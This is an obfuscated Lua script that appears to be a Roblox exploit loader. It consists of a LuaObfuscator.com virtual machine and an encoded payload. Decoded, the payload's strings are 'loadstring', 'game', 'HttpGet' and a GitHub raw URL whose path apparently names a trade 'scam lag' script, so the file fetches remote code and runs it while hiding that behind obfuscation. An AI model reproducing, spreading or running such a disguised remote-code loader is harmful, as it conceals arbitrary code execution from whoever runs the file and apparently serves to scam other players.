--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then function v21(v31,v32,v33)if v33 then local v71=(v31/((929 -(214 + 713))^(v32-(2 -1))))%((1 + 1)^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v71-(v71%((1890 -(226 + 1044)) -((2416 -1861) + 64))) ;else local v72=(933 -(857 + 74))^(v32-(1 -0)) ;return (((v31%(v72 + v72))>=v72) and (569 -(367 + 201))) or (1065 -(68 + 997)) ;end end v22=nil;function v22()local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(117 -((989 -(892 + 65)) + 85))) then v35=v1(v16,v19,v19);v19=v19 + 1 + 0 ;v34=1 + 0 ;end end end v23=nil;v18=2;end if (v18==2) then function v23()local v36=0 -0 ;local v37;local v38;while true do if (v36==(1 -(0 + 0))) then return (v38 * (469 -213)) + v37 ;end if (v36==0) then v37,v38=v1(v16,v19,v19 + (352 -(87 + 263)) );v19=v19 + (182 -(67 + 113)) ;v36=1;end end end v24=nil;function v24()local v39=0 -(0 -0) ;local v40;local v41;local v42;local v43;while true do if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v19,v19 + (8 -5) );v19=v19 + 3 + 1 ;v39=3 -2 ;end if (v39==(953 -(802 + 150))) then return (v43 * (38062656 -21285440)) + (v42 * (176444 -110908)) + (v41 * (464 -(207 + 1))) + v40 ;end end end v25=nil;v18=3;end if (v18==5) then v30=nil;function v30(v44,v45,v46)local v47=0;local v48;local v49;local v50;while true do if (1==v47) then v50=v44[3];return function(...)local v79=v48;local v80=v49;local v81=v50;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v95=0,v87 do if (v95>=v81) then v85[v95-v81 ]=v86[v95 + 1 ];else v89[v95]=v86[v95 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=6) then if (v92<=2) then if (v92<=0) then local v109=v91[2];local v110,v111=v82(v89[v109](v13(v89,v109 + 1 ,v91[3])));v84=(v111 + v109) -1 ;local v112=0;for v113=v109,v84 do v112=v112 + 1 ;v89[v113]=v110[v112];end elseif (v92==1) then local v117=0;local v118;local v119;local v120;local v121;while true do if (2==v117) then for v162=v118,v84 do v121=v121 + 1 ;v89[v162]=v119[v121];end break;end if (0==v117) then v118=v91[2];v119,v120=v82(v89[v118](v13(v89,v118 + 1 ,v91[3])));v117=1;end if (1==v117) then v84=(v120 + v118) -1 ;v121=0;v117=2;end end else v89[v91[2]]();end elseif (v92<=4) then if (v92>3) then local v122=v91[2];local v123=v89[v91[3]];v89[v122 + 1 ]=v123;v89[v122]=v123[v91[4]];else v89[v91[2]]=v46[v91[3]];end elseif (v92>5) then v89[v91[2]]();else v89[v91[2]]=v91[3];end elseif (v92<=9) then if (v92<=7) then do return;end elseif (v92==8) then local v131=0;local v132;local v133;while true do if (v131==0) then v132=v91[2];v133=v89[v91[3]];v131=1;end if (v131==1) then v89[v132 + 1 ]=v133;v89[v132]=v133[v91[4]];break;end end else v89[v91[2]]=v91[3];end elseif (v92<=11) then if (v92>10) then do return;end else v89[v91[2]]=v46[v91[3]];end elseif (v92==12) then local v138=v91[2];v89[v138]=v89[v138](v13(v89,v138 + 1 ,v84));else local v140=v91[2];v89[v140]=v89[v140](v13(v89,v140 + 1 ,v84));end v83=v83 + 1 ;end end;end if (v47==0) then v48=v44[1];v49=v44[2];v47=1;end end end return v30(v29(),{},v17)(...);end if (4==v18) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v51=1018 -(697 + 321) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if ((0 + 0)==v51) then v52=1288 -(993 + 295) ;v53=nil;v51=1;end if (v51~=(4 -2)) then else v56=nil;v57=nil;v51=3;end if (v51~=(2 + 1)) then else v58=nil;while true do local v93=0 -0 ;while true do if (v93~=(1 + 0)) then else if (v52==(5 -3)) then local v104=1227 -(322 + 905) ;while true do if (v104~=(1172 -(418 + 753))) then else for v142=1 + 0 ,v24() do local v143=0 + 0 ;local v144;local v145;local v146;while true do if (v143==1) then v146=nil;while true do if (v144~=(0 + 0)) then else v145=0;v146=nil;v144=1 + 0 ;end if (v144==(873 -(826 + 46))) then while true do if (v145~=0) then else v146=v22();if (v21(v146,530 -(406 + 123) ,3 -2 )~=(1769 -(1749 + 20))) then else local v171=0;local v172;local v173;local v174;local v175;local v176;local v177;while true do if (v171~=(1 + 1)) then else v176=nil;v177=nil;v171=1325 -(1249 + 73) ;end if (1==v171) then v174=nil;v175=nil;v171=1 + 1 ;end if ((1145 -(466 + 679))==v171) then v172=0;v173=nil;v171=1;end if (v171~=(3 + 0)) then else while true do if (v172~=(2 -1)) then else local v182=0 -0 ;while true do if (v182==1) then v172=3 -1 ;break;end if (0==v182) then v175=nil;v176=nil;v182=1;end end end if (v172==(1900 -(106 + 1794))) then local v183=0;while true do if (v183~=(1 + 0)) then else v172=1 + 0 ;break;end if (v183==(1205 -(902 + 303))) then v173=0 -0 ;v174=nil;v183=1;end end end if (v172==2) then v177=nil;while true do if (v173==(5 -3)) then while true do if (0==v174) then local v188=0 + 0 ;local v189;local v190;while true do if ((114 -(4 + 110))==v188) then v189=584 -(57 + 527) ;v190=nil;v188=1428 -(41 + 1386) ;end if (v188==(1691 -(1121 + 569))) then while true do if (v189==(214 -(22 + 192))) then v190=103 -(17 + 86) ;while true do if (v190==(1 + 0)) then v174=1 -0 ;break;end if (v190==(0 -0)) then local v201=0;while true do if (v201==(0 -0)) then local v207=765 -(468 + 297) ;while true do if ((0 -0)==v207) then v175=v21(v146,168 -(122 + 44) ,5 -2 );v176=v21(v146,12 -8 ,6);v207=1 + 0 ;end if (v207~=(1 + 0)) then else v201=1 -0 ;break;end end end if (v201~=(66 -(30 + 35))) then else v190=1;break;end end end end break;end end break;end end end if ((2 + 0)==v174) then local v191=1257 -(1043 + 214) ;local v192;local v193;while true do if ((0 -0)==v191) then v192=0 -0 ;v193=nil;v191=1;end if (v191==1) then while true do if (v192~=(0 -0)) then else v193=1212 -(323 + 889) ;while true do if (v193~=(2 -1)) then else v174=8 -5 ;break;end if (v193==0) then local v202=580 -(361 + 219) ;while true do if (v202==(321 -(53 + 267))) then v193=1 + 0 ;break;end if (v202==(413 -(15 + 398))) then if (v21(v176,983 -(18 + 964) ,1)==(3 -2)) then v177[2 + 0 ]=v58[v177[2]];end if (v21(v176,2 + 0 ,852 -(20 + 830) )==(1 + 0)) then v177[3 + 0 ]=v58[v177[129 -(116 + 10) ]];end v202=1 + 0 ;end end end end break;end end break;end end end if (v174==(3 + 0)) then if (v21(v176,3,7 -4 )==(1 + 0)) then v177[742 -(542 + 196) ]=v58[v177[4]];end v53[v142]=v177;break;end if (v174==(1 -0)) then local v195=0 + 0 ;local v196;local v197;while true do if (v195==(127 -(55 + 71))) then while true do if (v196==0) then v197=0 + 0 ;while true do if (v197~=(0 + 0)) then else v177={v23(),v23(),nil,nil};if (v175==(405 -(118 + 287))) then local v203=0 -0 ;local v204;local v205;local v206;while true do if (v203==1) then v206=nil;while true do if (v204~=(0 -0)) then else local v214=0 -0 ;while true do if ((0 -0)==v214) then v205=0 + 0 ;v206=nil;v214=1 -0 ;end if (v214==(1122 -(118 + 1003))) then v204=1;break;end end end if (v204==(807 -(118 + 688))) then while true do if (v205==(48 -(25 + 23))) then v206=0 -0 ;while true do if (v206~=(377 -(142 + 235))) then else v177[13 -10 ]=v23();v177[4]=v23();break;end end break;end end break;end end break;end if ((0 + 0)==v203) then v204=0 -0 ;v205=nil;v203=1;end end elseif (v175==(978 -(553 + 424))) then v177[3]=v24();elseif (v175==(3 -1)) then v177[3 + 0 ]=v24() -((3 -1)^16) ;elseif (v175==3) then local v215=0;local v216;local v217;while true do if (v215==1) then while true do if (v216~=0) then else v217=0;while true do if ((0 + 0)~=v217) then else v177[6 -3 ]=v24() -((2 + 0)^(7 + 9)) ;v177[9 -5 ]=v23();break;end end break;end end break;end if (v215~=(0 + 0)) then else v216=0;v217=nil;v215=2 -1 ;end end end v197=1;end if (v197==(2 -1)) then v174=4 -2 ;break;end end break;end end break;end if (v195==0) then v196=0;v197=nil;v195=1;end end end end break;end if (v173~=(1 + 0)) then else local v185=0;while true do if (v185==(0 -0)) then v176=nil;v177=nil;v185=754 -(239 + 514) ;end if (v185==(1 + 0)) then v173=2;break;end end end if (v173~=(1329 -(797 + 532))) then else local v186=1061 -(810 + 251) ;local v187;while true do if (v186==0) then v187=0 + 0 ;while true do if (v187~=(1 + 0)) then else v173=1 + 0 ;break;end if (v187==(0 -0)) then local v200=1202 -(373 + 829) ;while true do if (v200~=(732 -(476 + 255))) then else v187=534 -(43 + 490) ;break;end if ((1130 -(369 + 761))~=v200) then else v174=0;v175=nil;v200=3 -2 ;end end end end break;end end end end break;end end break;end end end break;end end break;end end break;end if (v143~=(859 -(240 + 619))) then else v144=0;v145=nil;v143=1 + 0 ;end end end v52=3;break;end if ((0 + 0)~=v104) then else for v147=1 -0 ,v57 do local v148=0 -0 ;local v149;local v150;local v151;local v152;local v153;while true do if ((238 -(64 + 174))==v148) then v149=0 + 0 ;v150=nil;v148=1745 -(1344 + 400) ;end if (v148~=(1 -0)) then else v151=nil;v152=nil;v148=2 + 0 ;end if (v148~=(2 + 0)) then else v153=nil;while true do if (v149==2) then while true do if (v150==(337 -(144 + 192))) then v153=nil;while true do if (v151==(4 -3)) then if (v152==(217 -(42 + 174))) then v153=v22()~=0 ;elseif (v152==(2 + 0)) then v153=v25();elseif (v152==(3 + 0)) then v153=v26();end v58[v147]=v153;break;end if (v151==(0 + 0)) then local v179=0;local v180;while true do if (v179~=(1504 -(363 + 1141))) then else v180=1580 -(1183 + 397) ;while true do if (v180==(2 -1)) then v151=1 + 0 ;break;end if (v180==(0 + 0)) then local v184=0 + 0 ;while true do if (v184==(1976 -(1913 + 62))) then v180=1 + 0 ;break;end if (v184==(0 -0)) then v152=v22();v153=nil;v184=1934 -(565 + 1368) ;end end end end break;end end end end break;end if (v150==0) then local v169=0 -0 ;local v170;while true do if ((1661 -(1477 + 184))==v169) then v170=0 -0 ;while true do if (v170~=0) then else local v181=449 -(108 + 341) ;while true do if (v181==0) then v151=0 + 0 ;v152=nil;v181=1 + 0 ;end if (v181~=(857 -(564 + 292))) then else v170=1;break;end end end if (1==v170) then v150=1 -0 ;break;end end break;end end end end break;end if (1==v149) then local v165=0 -0 ;while true do if (v165~=(1494 -(711 + 782))) then else v149=5 -3 ;break;end if (v165==(304 -(244 + 60))) then v152=nil;v153=nil;v165=1 + 0 ;end end end if (v149==(0 + 0)) then local v166=476 -(41 + 435) ;while true do if (v166==1) then v149=1002 -(938 + 63) ;break;end if (v166~=(0 + 0)) then else v150=0 + 0 ;v151=nil;v166=2 -1 ;end end end end break;end end end v56[2 + 1 ]=v22();v104=1168 -(645 + 522) ;end end end if (v52==(1793 -(1010 + 780))) then local v105=1125 -(936 + 189) ;local v106;while true do if (v105==(0 + 0)) then v106=0;while true do if (v106==(1613 -(1565 + 48))) then local v154=0;while true do if (v154==(0 -0)) then for v167=2 -1 ,v24() do v54[v167-(1837 -(1045 + 791)) ]=v29();end return v56;end end end end break;end end end break;end if (v93==(0 + 0)) then if (0~=v52) then else local v107=1138 -(782 + 356) ;local v108;while true do if ((267 -(176 + 91))==v107) then v108=505 -(351 + 154) ;while true do if (v108==1) then v55={};v52=1575 -(1281 + 293) ;break;end if (v108~=(0 -0)) then else local v155=0 -0 ;while true do if (v155==(0 -0)) then v53={};v54={};v155=1560 -(1381 + 178) ;end if (v155==(1093 -(975 + 117))) then v108=1;break;end end end end break;end end end if (v52==(1876 -(157 + 1718))) then v56={v53,v54,nil,v55};v57=v24();v58={};v52=6 -4 ;end v93=1 + 0 ;end end end break;end if (v51~=(471 -(381 + 89))) then else v54=nil;v55=nil;v51=6 -4 ;end end end v18=5;end if (v18==3) then function v25()local v59=v24();local v60=v24();local v61=1;local v62=(v21(v60,(3 -2) + 0 ,20) * ((2 + 0)^32)) + v59 ;local v63=v21(v60,21,52 -21 );local v64=((v21(v60,1188 -((3068 -(109 + 1885)) + 82) )==(1 -0)) and  -(1785 -(214 + 1570))) or (1456 -(990 + 465)) ;if (v63==(0 + 0)) then if (v62==((1469 -(1269 + 200)) + 0)) then return v64 * (0 + 0) ;else local v94=0 -0 ;while true do if (v94==(1726 -((3196 -1528) + 58))) then v63=627 -(512 + 114) ;v61=0 -0 ;break;end end end elseif (v63==(4231 -2184)) then return ((v62==(0 -0)) and (v64 * (((816 -(98 + 717)) + 0)/(0 + 0)))) or (v64 * NaN) ;end return v8(v64,v63-(1849 -(802 + 24)) ) * (v61 + (v62/((2 -0)^(46 + 6)))) ;end v26=nil;function v26(v65)local v66;if  not v65 then local v73=0 -0 ;while true do if (v73==(0 + 0)) then v65=v24();if (v65==(0 + (0 -0))) then return "";end break;end end end v66=v3(v16,v19,(v19 + v65) -(1 + 0) );v19=v19 + v65 ;local v67={};for v69=1 + 0 , #v66 do v67[v69]=v2(v1(v3(v66,v69,v69)));end return v6(v67);end v27=v24;v18=4;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v68)if (v1(v68,2)==79) then v20=v0(v3(v68,1,1));return "";else local v74=0;local v75;while true do if (v74==0) then v75=v2(v0(v68,16));if v20 then local v102=0;local v103;while true do if (v102==0) then v103=v5(v75,v20);v20=nil;v102=1;end if (v102==1) then return v103;end end else return v75;end break;end end end end);v21=nil;v18=1;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F596D797363726970742F596D797363726970742F6D61696E2F54726561642532307363616D2532306C612O6700083O0012033O00013O001203000100023O002008000100010003001205000300046O000100034O000C5O00022O00063O000100012O00073O00017O00",v9(),...);
